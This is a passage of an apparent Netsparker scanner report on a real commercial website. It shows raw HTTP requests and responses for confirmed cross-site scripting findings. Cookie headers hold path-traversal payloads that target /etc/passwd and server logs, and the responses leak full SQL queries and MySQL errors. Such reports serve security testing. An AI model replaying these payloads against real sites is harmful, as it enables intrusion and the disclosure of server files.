OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=u0iel7m16qf7b2hi6e3unfqfm7; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DF)%3C/script%3E

/ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DF)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005DF)</script>

Request

GET /ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005DF)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ho9ee9eh4eoff7bgbjq10pv2b4; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/

/ppc/leadflow/parl00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/?'"--></style></script><script>alert(0x0005E1)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005E1)</script>

Request

GET /ppc/leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=stu5a679s5sqqmctfiojln7002; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?'"--></style></script><script>alert(0x0005DD..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005DD)</script>

Request

GET /ppc/leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 